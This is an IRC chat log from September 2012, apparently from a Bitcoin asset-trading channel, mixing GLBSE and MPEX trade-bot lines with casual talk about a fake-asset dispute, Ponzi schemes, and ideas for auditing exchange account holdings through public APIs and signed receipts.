MPEX Sep 22 21:31:02 [GLBSE] [NYAN.C] 1 @ 0.26000001 BTC [+] Sep 22 21:31:04 [GLBSE] [NYAN.C] 10 @ 0.26 = 2.6 BTC [-] Sep 22 21:32:26 [GLBSE] [GSDPT] 4000 @ 0.0034 = 13.6 BTC [+] Sep 22 21:32:53 [GLBSE] [BITBOND] 5 @ 0.3601 = 1.8005 BTC [-] Sep 22 21:33:03 [GLBSE] [OBSI.HRPT] 1 @ 0.086 BTC [-] Sep 22 21:33:05 [GLBSE] [OBSI.HRPT] 49 @ 0.08400001 = 4.116 BTC [-] Sep 22 21:36:13 [GLBSE] [PGM] 1 @ 0.24 BTC [-] Sep 22 21:37:15 http://www.youtube.com/watch?feature=player_embedded&v=d3CWLCoQu7c Sep 22 21:38:06 [GLBSE] [ASICMINER] 1 @ 0.1218999 BTC [+] Sep 22 21:38:08 [GLBSE] [ASICMINER] 60 @ 0.1218999 = 7.314 BTC [+] Sep 22 21:40:56 [GLBSE] [ASICMINER] 64 @ 0.1218999 = 7.8016 BTC [+] Sep 22 21:41:03 [GLBSE] [HYDRO.BONDS] 1 @ 1.4488 BTC [+] Sep 22 21:41:52 [GLBSE] [GIGAMINING] 7 @ 0.64430002 = 4.5101 BTC [-] Sep 22 21:41:53 [GLBSE] [GIGAMINING] 6 @ 0.64400001 = 3.864 BTC [-] Sep 22 21:41:54 [GLBSE] [GIGAMINING] 27 @ 0.644 = 17.388 BTC [-] Sep 22 21:50:58 [GLBSE] [MERGEDMINING] 3 @ 0.08199 = 0.246 BTC [-] Sep 22 21:52:05 [MPEX] [F.GIGA.ETF] 579 @ 0.00028988 = 0.1678 BTC [-] Sep 22 21:52:07 [MPEX] [F.GIGA.ETF] 7971 @ 0.00028964 = 2.3087 BTC [-] Sep 22 21:52:08 [MPEX] [S.MPOE] 3400 @ 0.00040239 = 1.3681 BTC [-] Sep 22 21:55:45 [GLBSE] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Sep 22 22:01:52 [GLBSE] [OBSI.HRPT] 33 @ 0.08400001 = 2.772 BTC [-] Sep 22 22:01:54 [GLBSE] [OBSI.HRPT] 10 @ 0.084 = 0.84 BTC [-] Sep 22 22:01:55 [GLBSE] [BDK.BND] 1 @ 0.097 BTC [-] Sep 22 22:18:01 [GLBSE] [OBSI.HRPT] 17 @ 0.08000003 = 1.36 BTC [-] Sep 22 22:18:05 [MPEX] [F.GIGA.ETF] 8029 @ 0.00028964 = 2.3255 BTC [-] Sep 22 22:18:07 [MPEX] [F.GIGA.ETF] 1571 @ 0.00028776 = 0.4521 BTC [-] Sep 22 22:18:08 [MPEX] [S.MPOE] 500 @ 0.00040238 = 0.2012 BTC [-] Sep 22 22:18:08 [MPEX] [S.MPOE] 3100 @ 0.00040288 = 1.2489 BTC [+] Sep 22 22:18:09 [MPEX] [S.MPOE] 3896 @ 0.00040432 = 1.5752 BTC [+] Sep 22 22:20:21 [GLBSE] [MU] 2 @ 0.209 = 0.418 BTC [-] Sep 22 22:26:21 I got some BTC burning my pockets. Sep 22 22:26:28 Anyone got something for me? Sep 22 22:27:32 Yeah, I think I'll pass my chance Sep 22 22:28:09 I haven't earned money sending money to random addresses Sep 22 22:28:51 pff, there's 7% weekly scam, and 3-5% weekly legit Sep 22 22:30:02 Lol, after what pirate did. Sep 22 22:30:26 All the people in poorly legislated countries arrive thinking "ooohh, easy money!" Sep 22 22:31:45 The people in intensely legislated countries are guilty no matter what they do. So they decided they might as well ponzi the heck out of the forums. Sep 22 22:32:05 What L word? Legit? Legit legit legit. Sep 22 22:32:46 You know you can start with 0 money and get infinite % on that legitly? It's called a job. It's legit. Sep 22 22:33:11 EskimoBob: it can work, but we can't limit it to the existing community Sep 22 22:33:16 which is too small Sep 22 22:33:17 and Sep 22 22:33:26 lacks common sense it seems Sep 22 22:33:50 Smoovious has issues with specific words. Sep 22 22:34:14 I also think that in the long term, we need a very large bitcoin economy that is legit, and the illegit part of the bitcoin economy has to be only a fraction of the size Sep 22 22:34:16 otherwise Sep 22 22:34:19 it will never grow Sep 22 22:34:58 BitInstant Mastercard might help. Sep 22 22:35:12 [GLBSE] [KRAKEN] 25 @ 0.00999996 = 0.25 BTC [+] Sep 22 22:36:19 I'm all for the dark and hidden economy, but it needs a legit one to hide in, if all of bitcoinland is dark, then the gov will just stop people getting into bitcoinland, economic sanctions if you will Sep 22 22:36:55 http://s3.amazonaws.com/rapgenius/1310582967_0.jpg Sep 22 22:36:59 pedo glasses Sep 22 22:37:57 good evening gents. Sep 22 22:38:04 No, it was uncle Bleh Sep 22 22:38:06 Does anyone know Goats home address? Sep 22 22:38:11 I think he's having a stroke Sep 22 22:38:11 Stop mixing them up Sep 22 22:38:18 we need to get medical attention to him Sep 22 22:38:21 ASAP Sep 22 22:38:27 I don't Sep 22 22:39:28 I'm not joking Sep 22 22:39:34 have you read his last few posts Sep 22 22:39:44 they're not making any fucking sense Sep 22 22:40:04 If he keeps writing, he's not having a stroke. Sep 22 22:40:30 Might be some kid or retarted friend of his who thinks it's funny. Sep 22 22:41:22 urlpls? Sep 22 22:42:47 no url? Sep 22 22:42:48 meh Sep 22 22:42:53 like Sep 22 22:42:53 this is how I would imagine someone types when they've had a stroke Sep 22 22:42:53 and not in the normal sense Sep 22 22:42:53 when we're talking about goat and normality Sep 22 22:42:54 Chaang-Noi: you ok dude? Sep 22 22:43:08 oh Sep 22 22:43:14 oh thats much better then Sep 22 22:43:16 lol Sep 22 22:43:19 he's drunk Sep 22 22:43:21 hahaha Sep 22 22:43:49 NEFARIO URLPLS Sep 22 22:43:59 one sec Sep 22 22:44:07 https://bitcointalk.org/index.php?topic=112071.40;topicseen Sep 22 22:44:10 thanks Sep 22 22:44:35 Actually I don't drink Sep 22 22:44:37 Oh... the fake GLBSE stock... Chaang is unhappy about that... Sep 22 22:44:45 and Drunk... Sep 22 22:45:01 He deleted the main post Sep 22 22:45:06 [MPEX] [F.GIGA.ETF] 3935 @ 0.00028776 = 1.1323 BTC [-] Sep 22 22:45:16 He might be having second thoughts now that his thoughts are clearing up. Sep 22 22:45:35 possibly Sep 22 22:46:07 [GLBSE] [GOLD] 10 @ 0.00998999 = 0.0999 BTC [-] Sep 22 22:46:08 But yeah nefario, you should be more careful of what you say, just be sure you can do what you say prior to saying it. Sep 22 22:46:10 anyway, theymos isn't getting involved because he's a GLBSE shareholder Sep 22 22:46:25 BTC-Mining: that was 7 months ago Sep 22 22:46:30 like I said in the post Sep 22 22:46:35 I fucked up Sep 22 22:46:59 nefario, are any assets moving to blue or pink market Sep 22 22:47:06 not yet Sep 22 22:47:06 eh Sep 22 22:47:10 blue or white Sep 22 22:47:12 aha Sep 22 22:47:12 I've to set out the process to do that Sep 22 22:47:27 well no point in having those buttons until then Sep 22 22:47:40 [GLBSE] [SILVER] 10 @ 0.00998 = 0.0998 BTC [-] Sep 22 22:47:45 Nefario, your post says: "Yes, I think we can all agree that having a safe SEXCHANGE is of considerable..." Sep 22 22:47:59 yeah Sep 22 22:48:02 remove that "s" please xD Sep 22 22:48:03 safe sex change is important. Sep 22 22:48:16 you dont want to end up with two dicks. Sep 22 22:48:28 oh, so does the quote xD Sep 22 22:49:08 ja Sep 22 22:49:27 [GLBSE] [ASICMINER] 5 @ 0.12189 = 0.6095 BTC [-] Sep 22 22:49:28 [GLBSE] [ASICMINER] 5 @ 0.12199 = 0.61 BTC [+] Sep 22 22:50:06 Heck, if you want, I'd pay for people who bought that scam asset so they can be reimbursed. Sep 22 22:50:49 I think many here would be willing to donate, if the issue is you can't spend GLBSE's funds on reimbursment. Sep 22 22:51:00 Because of the other shareholders not agreeing with that. Sep 22 22:51:32 Smoovious, thats ok, i dont need to satisfy a lot of chicks. Sep 22 22:52:00 BTC-Mining: The asset is being bought back Sep 22 22:52:04 at the same price it was sold Sep 22 22:52:26 What goat is complaining about is that he sold some of those fake assets for 10BTC each Sep 22 22:52:33 made him a ton of money Sep 22 22:52:41 and wants me to buy them back at that price Sep 22 22:53:17 another day, another drama ? Sep 22 22:53:22 he also thinks that theymos and I are colluding on this Sep 22 22:53:51 theymos said since he's a GLBSE shareholder then it's a conflict of interest for him to make any decision on this issue Sep 22 22:53:57 If he hasn't bought them 10 BTC, why reimburse him 10 BTC per share? Sep 22 22:54:07 I don't know Sep 22 22:54:13 he's being retarded Sep 22 22:54:30 and trying to get a scammer label put on me as a result Sep 22 22:54:37 He sounds drunk too... Sep 22 22:55:28 Chaang-Noi, partying is fun but you should probably install a anti-drunken start screen on your computer or something. Sep 22 22:56:03 something where he has to spell a long word would put a stop to it Sep 22 22:57:20 partying? Sep 22 22:57:22 fun? Sep 22 22:57:27 http://bit.ly/tfluV3 Sep 22 22:57:41 hm Sep 22 22:57:45 wrong paste dafuq Sep 22 22:58:21 hm nevermind its correct Sep 22 22:58:57 Indeed... Sep 22 22:59:05 or if it's a mistake, it fits... Sep 22 23:01:00 well obviously he bought those to cause trouble Sep 22 23:02:20 [GLBSE] [ASICMINER] 8 @ 0.12199 = 0.9759 BTC [+] Sep 22 23:02:51 Anyone selling ASICMINER/BIB.BVPS/GIGAMINING? Sep 22 23:11:08 [MPEX] [F.GIGA.ETF] 2784 @ 0.00028776 = 0.8011 BTC [-] Sep 22 23:14:31 [GLBSE] [COGNITIVE] 5 @ 0.5897 = 2.9485 BTC [-] Sep 22 23:19:43 [GLBSE] [OBSI.HRPT] 1 @ 0.09199999 BTC [+] Sep 22 23:20:43 Pff, why do I always have more money than I can spend. Sep 22 23:21:08 silver spooner. Sep 22 23:22:05 I was born poor, I worked hard for this money! Sep 22 23:22:42 Seriously tho, just having a hard time getting orders filled. Sep 22 23:22:58 you can't buy giga ? Sep 22 23:23:29 I actually don't buy into asks and place bids instead. Sep 22 23:23:40 Asks are always too expensive. Sep 22 23:23:40 well, cheaper but slower. Sep 22 23:23:50 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [+] Sep 22 23:27:10 https://bitcointalk.org/index.php?topic=81357.msg1208195#msg1208195 wtf is this i don't even... Sep 22 23:32:12 [GLBSE] [GSDPT] 35 @ 0.0034 = 0.119 BTC [+] Sep 22 23:36:34 [MPEX] [S.MPOE] 9900 @ 0.00040234 = 3.9832 BTC [-] Sep 22 23:38:57 !ticker mpoe.etf Sep 22 23:39:06 [GLBSE:MPOE.ETF] [Bid: 0.15000001] [Ask: 1.33999999] [Spread: 1.18999998] [Last: 1.33] [24hVol: ] [7dAvg: 1.33] Sep 22 23:42:37 [MPEX] [O.BTCUSD.C110T] 30 @ 0.15008359 = 4.5025 BTC [-] Sep 22 23:44:59 https://bitcointalk.org/index.php?topic=112071.0 Sep 22 23:45:03 nefario gets scammer tag nao ?! Sep 22 23:45:17 you know Sep 22 23:45:27 you could try to buy those GLBSE shares that are being sold Sep 22 23:45:30 hahah that thread is hilarious xD Sep 22 23:45:31 contact theymos Sep 22 23:45:39 goat gets more and more drunk as the thread goes on Sep 22 23:46:28 yeah Sep 22 23:46:36 like after post 4 I think he doesn't make any sense Sep 22 23:46:42 and is just quoting himself Sep 22 23:47:10 and you still figure you're competing with me, somehow ? Sep 22 23:48:49 did you read the post from bitcoin magazine about the conference? Sep 22 23:49:03 there are quite a few pics there Sep 22 23:49:11 see if you can figure out which one I am Sep 22 23:49:59 no, seriously. scarcely a day goes by without some ridiculousness of this level Sep 22 23:50:11 you're a roadshow by now, do you realise this ? Sep 22 23:53:17 medical emergeny Sep 22 23:53:23 prep the burn room Sep 22 23:55:34 DeaDTerra, why do you comment your name when you sign a post Sep 22 23:56:14 http://xkcd.com/156/ Sep 23 00:02:17 I don't get it Sep 23 00:02:25 lol Sep 23 00:02:48 arent you a coder Sep 23 00:03:05 I don't use and IDE Sep 23 00:03:13 notepad.exe Sep 23 00:03:16 :p Sep 23 00:03:22 no I use emacs Sep 23 00:03:23 i dont use ide as well Sep 23 00:03:23 I don't know it's a habit :P Sep 23 00:03:31 doesnt stop me from knowing // Sep 23 00:03:33 I sign all my messages with //DeaDTerra Sep 23 00:03:41 I am not a coder :( Sep 23 00:03:41 [GLBSE] [GOLD] 18 @ 0.00998999 = 0.1798 BTC [-] Sep 23 00:03:51 notepad.exe? it makes me shiver Sep 23 00:05:22 om nom nom Sep 23 00:05:59 [GLBSE] [SILVER] 18 @ 0.00998 = 0.1796 BTC [-] Sep 23 00:06:11 copumpkin: thats not an editor I know of Sep 23 00:06:20 omnomnomicon! Sep 23 00:06:44 yeah Sep 23 00:06:50 type that on the command line Sep 23 00:07:18 its apt-get install omnomnomicon you fool! Sep 23 00:07:32 [GLBSE] [OBSI.HRPT] 50 @ 0.09199997 = 4.6 BTC [-] Sep 23 00:07:41 what is up with Chaang-Noi's mysterious nefario-accusing thread with no info on it? Sep 23 00:08:23 he's drunk Sep 23 00:08:29 got a shipment of tax free gin Sep 23 00:08:36 nice Sep 23 00:08:45 you can see the quality of his posts falling Sep 23 00:08:45 120% drunk. Sep 23 00:08:52 on a boat? Sep 23 00:08:53 from each post to the next Sep 23 00:09:06 [MPEX] [S.MPOE] 7700 @ 0.00040432 = 3.1133 BTC [+] Sep 23 00:09:07 lol Sep 23 00:10:56 [GLBSE] [OBSI.HRPT] 4 @ 0.09199997 = 0.368 BTC [-] Sep 23 00:16:43 [GLBSE] [GSDPT] 1 @ 0.00336 BTC [-] Sep 23 00:18:08 [GLBSE] [YABMC] 2 @ 0.0906 = 0.1812 BTC [-] Sep 23 00:18:54 [GLBSE] [YABMC] 25 @ 0.0907 = 2.2675 BTC [+] Sep 23 00:19:25 [GLBSE] [FUTUREFUND] 1 @ 0.00012935 BTC [-] Sep 23 00:19:38 [GLBSE] [YABMC] 5 @ 0.0907 = 0.4535 BTC [+] Sep 23 00:20:06 [GLBSE] [YABMC] 1 @ 0.0907 BTC [+] Sep 23 00:20:22 [GLBSE] [FUTUREFUND] 1 @ 0.00012935 BTC [-] Sep 23 00:20:31 !help Sep 23 00:20:32 List of commands: Sep 23 00:20:33 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 23 00:20:34 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 23 00:21:02 !ticker [YABMC] Sep 23 00:21:13 !ticker yabmc Sep 23 00:21:16 Invalid ticker. Sep 23 00:21:19 oops Sep 23 00:21:23 haha Sep 23 00:21:30 on goats gin Sep 23 00:21:41 !ticker YABMC Sep 23 00:21:45 [GLBSE:YABMC] [Bid: 0.08185] [Ask: 0.0906] [Spread: 0.00875] [Last: 0.0907] [24hVol: 0.1816] [7dAvg: 0.08484319] Sep 23 00:22:05 [GLBSE:YABMC] [Bid: 0.08185] [Ask: 0.0906] [Spread: 0.00875] [Last: 0.0907] [24hVol: 0.1816] [7dAvg: 0.08484319] Sep 23 00:22:05 [GLBSE] [FUTUREFUND] 1 @ 0.00012935 BTC [-] Sep 23 00:22:11 fuckyea. Sep 23 00:26:07 [MPEX] [S.MPOE] 37268 @ 0.00040432 = 15.0682 BTC [+] Sep 23 00:26:09 [MPEX] [S.MPOE] 33723 @ 0.0004055 = 13.6747 BTC [+] Sep 23 00:26:10 [MPEX] [S.MPOE] 45600 @ 0.0004071 = 18.5638 BTC [+] Sep 23 00:26:10 [MPEX] [S.MPOE] 7275 @ 0.00040791 = 2.9675 BTC [+] Sep 23 00:26:12 [MPEX] [S.MPOE] 18400 @ 0.00040895 = 7.5247 BTC [+] Sep 23 00:26:13 [MPEX] [S.MPOE] 24238 @ 0.000413 = 10.0103 BTC [+] Sep 23 00:26:14 [MPEX] [S.MPOE] 5000 @ 0.00041723 = 2.0862 BTC [+] Sep 23 00:26:15 [MPEX] [S.MPOE] 19699 @ 0.00041856 = 8.2452 BTC [+] Sep 23 00:26:16 [MPEX] [S.MPOE] 93797 @ 0.00042 = 39.3947 BTC [+] Sep 23 00:28:33 What's the lead time on GLBSE support requests these days? Sep 23 00:34:20 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.9134576 BTC [+] Sep 23 00:40:45 minisplit Sep 23 00:41:36 It was a bot and server is herding them to botland Sep 23 00:42:31 [GLBSE] [GIGAMINING] 5 @ 0.64470008 = 3.2235 BTC [+] Sep 23 00:44:29 [GLBSE] [OBSI.HRPT] 1 @ 0.09039999 BTC [-] Sep 23 00:51:21 [MPEX] [F.GIGA.ETF] 3661 @ 0.00028776 = 1.0535 BTC [-] Sep 23 00:51:22 [MPEX] [F.GIGA.ETF] 1343 @ 0.00028622 = 0.3844 BTC [-] Sep 23 00:51:23 [MPEX] [F.GIGA.ETF] 5996 @ 0.00028416 = 1.7038 BTC [-] Sep 23 01:17:07 [MPEX] [F.GIGA.ETF] 8695 @ 0.00028416 = 2.4708 BTC [-] Sep 23 01:17:09 [MPEX] [F.GIGA.ETF] 3605 @ 0.00028355 = 1.0222 BTC [-] Sep 23 01:20:12 goat, didnt you had your shot of hero when you made this thread? https://bitcointalk.org/index.php?topic=112071.60 Sep 23 01:20:39 [GLBSE] [OBSI.HRPT] 14 @ 0.09030001 = 1.2642 BTC [-] Sep 23 01:20:40 [GLBSE] [OBSI.HRPT] 17 @ 0.0903 = 1.5351 BTC [-] Sep 23 01:20:42 [GLBSE] [OBSI.HRPT] 5 @ 0.09 = 0.45 BTC [-] Sep 23 01:20:43 [GLBSE] [OBSI.HRPT] 7 @ 0.084 = 0.588 BTC [-] Sep 23 01:20:44 [GLBSE] [OBSI.HRPT] 4 @ 0.083 = 0.332 BTC [-] Sep 23 01:20:45 [GLBSE] [OBSI.HRPT] 4 @ 0.0800005 = 0.32 BTC [-] Sep 23 01:20:47 [GLBSE] [OBSI.HRPT] 10 @ 0.08000002 = 0.8 BTC [-] Sep 23 01:20:48 [GLBSE] [OBSI.HRPT] 39 @ 0.08 = 3.12 BTC [-] Sep 23 01:20:48 obsi dump Sep 23 01:20:57 obsi already dumped Sep 23 01:21:15 what do you mean? Sep 23 01:21:36 buy now! Sep 23 01:21:40 I dumped obsi also if thats what you mean Sep 23 01:21:54 for 0.105 :D Sep 23 01:25:53 Nefario, are you sure we can't have an option for account holdings to be public? or at least have an audit service? Sep 23 01:26:16 did I say that you cant? Sep 23 01:26:54 No, but I meant there's no *official* system to audit holdings Sep 23 01:28:03 that would require auditors Sep 23 01:28:16 or non-transactional API keys Sep 23 01:29:12 or option Sep 23 01:29:28 read only keys? Sep 23 01:31:22 Aye. Or option, would be as simple as a checkbox that can be changed in settings. Then a page like https://glbse.com/api/public/username would check if that setting is set to true and return a list of holdings. Sep 23 01:32:50 I think most funds/management based assets could benefit for that. Sep 23 01:33:17 I don't see why auditors should waste time weekly to audit again and again when an API could manage that Sep 23 01:35:20 api sounds likea good idea Sep 23 01:37:09 aye, seems like a public api url + account setting checkbox would work great. Although it's up to you. Sep 23 01:37:18 oho Olandai penkti Sep 23 01:37:47 sorry wrong channel :) Sep 23 01:39:27 [GLBSE] [GIGAMINING] 5 @ 0.67377958 = 3.3689 BTC [+] Sep 23 01:44:07 [MPEX] [F.GIGA.ETF] 2495 @ 0.00028355 = 0.7075 BTC [-] Sep 23 01:44:09 [MPEX] [F.GIGA.ETF] 4500 @ 0.00028342 = 1.2754 BTC [-] Sep 23 01:44:10 [MPEX] [F.GIGA.ETF] 6405 @ 0.00028314 = 1.8135 BTC [-] Sep 23 01:55:35 [GLBSE] [BITCOINMINV] 7 @ 0.12499999 = 0.875 BTC [-] Sep 23 01:55:37 [GLBSE] [BITCOINMINV] 11 @ 0.125 = 1.375 BTC [+] Sep 23 01:58:04 < nefario> that would require auditors << which would need to be cpa's in 'merica and ca's in UK Sep 23 01:58:25 sorry what? Sep 23 01:58:41 oh Sep 23 01:58:44 in 'merica you have to be a CPA to perform an audit Sep 23 01:58:45 chartered accountants Sep 23 01:58:50 yup Sep 23 01:58:55 yeah it depends Sep 23 01:58:59 obviously Sep 23 01:59:08 yes, but generally Sep 23 01:59:16 we don't have the resources to employ full time auditors Sep 23 01:59:33 even hourly would be ~200usd/hour Sep 23 01:59:39 sure Sep 23 01:59:48 must be a more economical/efficient method Sep 23 02:00:07 auditing scripts that are public? Sep 23 02:00:09 legally, for 'public' companies... not really Sep 23 02:00:21 public companies no Sep 23 02:00:24 no other choice Sep 23 02:00:32 but lets talk about bitcoin listed projects Sep 23 02:00:34 in some states a bookkeeper could audit a private company Sep 23 02:00:37 and forget the term company Sep 23 02:00:49 for the projects that are listed on GLBSE Sep 23 02:00:59 there must be a way for us to allow auditing Sep 23 02:01:01 or Sep 23 02:01:04 a form of auditing Sep 23 02:01:21 without them having to be 100% transparent to the public Sep 23 02:01:27 for a project, maybe a bookkeeper, but if the state determines that it's a company, the bookkeeper is fucked Sep 23 02:01:35 yeah Sep 23 02:01:43 soooo Sep 23 02:01:45 I was thinking Sep 23 02:01:49 auditing scripts Sep 23 02:01:55 I expose an API Sep 23 02:02:06 that allows people to run auditing scripts Sep 23 02:02:17 the scripts are not allowed to reveal actual information Sep 23 02:02:18 but Sep 23 02:02:32 can give something of a result Sep 23 02:02:38 for example Sep 23 02:02:44 I'm sure a script could be written Sep 23 02:02:59 that would be able to detect ponzi like activity Sep 23 02:03:02 or Sep 23 02:03:15 paying dividends from initial capital that was raised Sep 23 02:03:25 although Sep 23 02:03:36 [GLBSE] [OBSI.HRPT] 35 @ 0.08000001 = 2.8 BTC [+] Sep 23 02:03:38 [GLBSE] [OBSI.HRPT] 61 @ 0.08 = 4.88 BTC [-] Sep 23 02:03:39 [GLBSE] [OBSI.HRPT] 100 @ 0.075 = 7.5 BTC [-] Sep 23 02:03:40 [GLBSE] [OBSI.HRPT] 3 @ 0.07402 = 0.2221 BTC [-] Sep 23 02:03:40 I suppose someone would just need to move the BTC off GLBSE to fuck that idea up Sep 23 02:03:40 [GLBSE] [OBSI.HRPT] 14 @ 0.074 = 1.036 BTC [-] Sep 23 02:03:41 [GLBSE] [OBSI.HRPT] 25 @ 0.073 = 1.825 BTC [-] Sep 23 02:03:42 [GLBSE] [OBSI.HRPT] 2 @ 0.0721 = 0.1442 BTC [-] Sep 23 02:03:43 [GLBSE] [OBSI.HRPT] 9 @ 0.07202 = 0.6482 BTC [-] Sep 23 02:03:45 [GLBSE] [OBSI.HRPT] 81 @ 0.07152 = 5.7931 BTC [-] Sep 23 02:03:46 [GLBSE] [OBSI.HRPT] 1 @ 0.07021508 BTC [-] Sep 23 02:03:47 [GLBSE] [OBSI.HRPT] 60 @ 0.07 = 4.2 BTC [-] Sep 23 02:03:48 [GLBSE] [OBSI.HRPT] 108 @ 0.07 = 7.56 BTC [-] Sep 23 02:03:58 yeah, there would be gaming and also. : Sep 23 02:04:04 [GLBSE] [MU] 3 @ 0.2 = 0.6 BTC [-] Sep 23 02:04:28 suppose they raise capital off of glbse too, and pay dividends out of the capital they nominally raised on glbse Sep 23 02:04:41 but 'actually' came from somewhere else Sep 23 02:05:24 yeah Sep 23 02:05:25 so Sep 23 02:05:31 we need auditors Sep 23 02:05:49 it's complicated stuff that takes a trained eye Sep 23 02:06:26 [GLBSE] [OBSI.HRPT] 7 @ 0.09036999 = 0.6326 BTC [+] Sep 23 02:06:35 even if it were legal for me to do it, i would be uncomfortable auditing all but the simplest business models Sep 23 02:07:16 look to arthur anderson to see what hapens when you even unknowingly mess up Sep 23 02:07:33 (enron for those who dont' get that) Sep 23 02:08:29 [GLBSE] [GSDPT] 150 @ 0.0034 = 0.51 BTC [+] Sep 23 02:08:48 Smoovious: i think BBBB leaves their funds on the exchange (or claims to anyway) Sep 23 02:08:56 also BlueChip Sep 23 02:09:06 (not sure of the ticker for bluechip) Sep 23 02:09:19 [GLBSE] [GSDPT] 30 @ 0.0034 = 0.102 BTC [+] Sep 23 02:10:04 well, they curate other bitcoin assets Sep 23 02:10:06 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Sep 23 02:10:09 [MPEX] [F.GIGA.ETF] 7711 @ 0.00028314 = 2.1833 BTC [-] Sep 23 02:10:10 [MPEX] [F.GIGA.ETF] 184 @ 0.0002814 = 0.0518 BTC [-] Sep 23 02:11:57 [GLBSE] [BITCOINRS] 4 @ 0.05 = 0.2 BTC [+] Sep 23 02:12:18 someone buying up gsdtp it seems, 1 decibitcoin at a time Sep 23 02:13:00 woah, nvm Sep 23 02:13:13 there was a ~130btc buy not too long ago Sep 23 02:14:14 ;;bc,stats Sep 23 02:14:15 Current Blocks: 200071 | Current Difficulty: 2864140.507811 | Next Difficulty At Block: 201599 | Next Difficulty In: 1528 blocks | Next Difficulty In About: 1 week, 2 days, 12 hours, 21 minutes, and 4 seconds | Next Difficulty Estimate: 3203366.97605985 | Estimated Percent Change: 11.8439185272 Sep 23 02:14:26 great. Sep 23 02:14:33 [GLBSE] [ASICMINER] 6 @ 0.12199 = 0.7319 BTC [+] Sep 23 02:14:54 11% eh? Sep 23 02:15:25 .py .35/.45 Sep 23 02:15:26 0.777777777778 Sep 23 02:16:10 whoa 3.2 mn ?! Sep 23 02:16:41 and asic isnt even close Sep 23 02:17:17 what's that supposed to mean kakobrekla Sep 23 02:17:23 Yeah, I was not talking about an "audit" audit Sep 23 02:17:34 smickles we might see 10mn next year. Sep 23 02:17:35 Just about making account data public Sep 23 02:17:41 When required Sep 23 02:18:04 So people can see if a fund's claimed holdings are indeed in the account. Sep 23 02:18:12 mircea_popescu: so what, asic not going to makeas large of an impact as previously expected? Sep 23 02:18:12 smickles, it will take months before we see asic doing work Sep 23 02:18:25 For example Sep 23 02:19:02 smickles i have no ideea, the only thing seems to be that network hash output growth consistently beats expectations. Sep 23 02:19:10 mircea_popescu, might see 10mn? we gonna see 10mn. i bet 1 btc on it. Sep 23 02:19:18 BTC-Mining maybe with a gpg signature of the exchange ? Sep 23 02:19:31 kakobrekla i ain't betting :p Sep 23 02:19:35 pussy. Sep 23 02:20:10 Well the statement only guarantees the holdings at the time the person requested the data... Sep 23 02:20:16 mircea_popescu only bets when it's a sure thing. like against me winning a 170 seat poker tourny Sep 23 02:20:26 So I guess simply making the data API visible would be enough. Sep 23 02:20:34 The signature wouldn't provide much at all. Sep 23 02:20:59 would prevent fake data tho Sep 23 02:21:15 If you access data directly on GLBSE.com, yes Sep 23 02:21:33 lol Sep 23 02:22:04 also, if X claims to have had y at z time, the sig could prove past events Sep 23 02:22:25 mircea, if someone has access to change that data, signing it would be just as possible. The person would have access to the server. Sep 23 02:22:48 If the person can change data on GLBSE, it would affect any signed receipt. Sep 23 02:22:49 MITM disagrees Sep 23 02:24:49 BTC-Mining: wouldn't you want to publish the status you the things in your account? Sep 23 02:25:46 I'd want the info to be made public Sep 23 02:26:04 as in if, for example, I check a box in settings to make holdings public Sep 23 02:26:24 glbse.com/api/public/username returns a list of holdings in that account Sep 23 02:26:35 if it's only public via an api, you are excluding people from the trustable knowledge of the information Sep 23 02:27:01 what? Sep 23 02:27:52 well, if i don't know how/don't want to call on an api, then i cant trust someone else telling me the info unless it's signed by glbse Sep 23 02:28:01 (or i trust that other person)\ Sep 23 02:28:21 Yeah, I meant the info to be shown directly on GLBSE Sep 23 02:28:22 (but why add in that risk) Sep 23 02:28:37 oh! like in the asset page? Sep 23 02:29:10 Or on the API page. You don't need to make API calls to see API pages Sep 23 02:29:23 It returns the value in an array Sep 23 02:29:30 values* Sep 23 02:29:35 yeah, but a lot of people need to clik a link for it to exist Sep 23 02:30:17 Aye, anyway. I need something to spend BTC on. Sep 23 02:30:48 spend it on accountanting services :) Sep 23 02:31:18 Bleh, what for? Sep 23 02:31:18 BTC-Mining: I like that you haven't bought mining hardware yet. Smart move. Sep 23 02:31:58 BTC-Mining: because i'm going to start an accounting company once if finish this move Sep 23 02:32:06 It's loaned to BitBond in exchange of hashing tho. I wonder what he spent it on. Sep 23 02:32:35 I would tell you the name, buy i haven't reserved it yet Sep 23 02:32:40 GPU/ASIC mix I would believe. Sep 23 02:32:46 *the name of the company Sep 23 02:34:23 We're a bit like a special shareholder in Bitbond. Sep 23 02:37:08 [MPEX] [F.GIGA.ETF] 6466 @ 0.0002814 = 1.8195 BTC [-] Sep 23 02:38:41 BTC-Mining are you sure you understand how signed receipts work ? cause no, having access to the server wouldn't invalidate a signature. Sep 23 02:39:14 It depends if the key and signature is done automatically from the server. Sep 23 02:39:19 o boy. Sep 23 02:39:29 we're going to have the 2 years of learning how to use wallets on servers Sep 23 02:39:38 to get the signatures figured out too, huh. Sep 23 02:39:50 2015, 2020 ? Sep 23 02:40:29 Ah, you're suggesting with the cold wallet's key? Would have to be manual signatures. Sep 23 02:40:55 i'm not suggesting anything really. Sep 23 02:41:02 just pointing out that a solution already exists. Sep 23 02:41:14 [GLBSE] [RAREEARTH] 3 @ 0.00980001 = 0.0294 BTC [-] Sep 23 02:41:44 Well the main point would be to not have someone always verifying accounts holdings. Sep 23 02:42:08 [MPEX] [S.MPOE] 25000 @ 0.00042 = 10.5 BTC [+] Sep 23 02:42:39 BTC-Mining you just publish your stats / dividend payment receipts. Sep 23 02:43:45 [GLBSE] [GOLD] 5 @ 0.00995 = 0.0498 BTC [-] Sep 23 02:44:58 [GLBSE] [PLATINUM] 5 @ 0.00999998 = 0.05 BTC [+] Sep 23 02:45:24 But I can't publish that myself, the point would be for people to be able to verify themselves directly on GLBSE.com what a public account is holding. Sep 23 02:45:54 but it's signed. Sep 23 02:47:09 Signed by GLBSE? GLBSE needs to have the key on the server to generate signed receipts... Sep 23 02:47:22 http://www.youtube.com/watch?v=_xWW4WmBtk8 Sep 23 02:47:29 So if someone can change data on GLBSE... signed receipts are affected too... Sep 23 02:47:49 Hence why sign receipts at all instead of just showing the data? Sep 23 02:48:50 i dunno guy. Sep 23 02:48:59 why do you even get a title deed instead of just being told you own the car ? Sep 23 02:49:04 they could call you on the phone say. Sep 23 02:49:34 The deed is different. It's to prove ownership. Sep 23 02:49:55 ... Sep 23 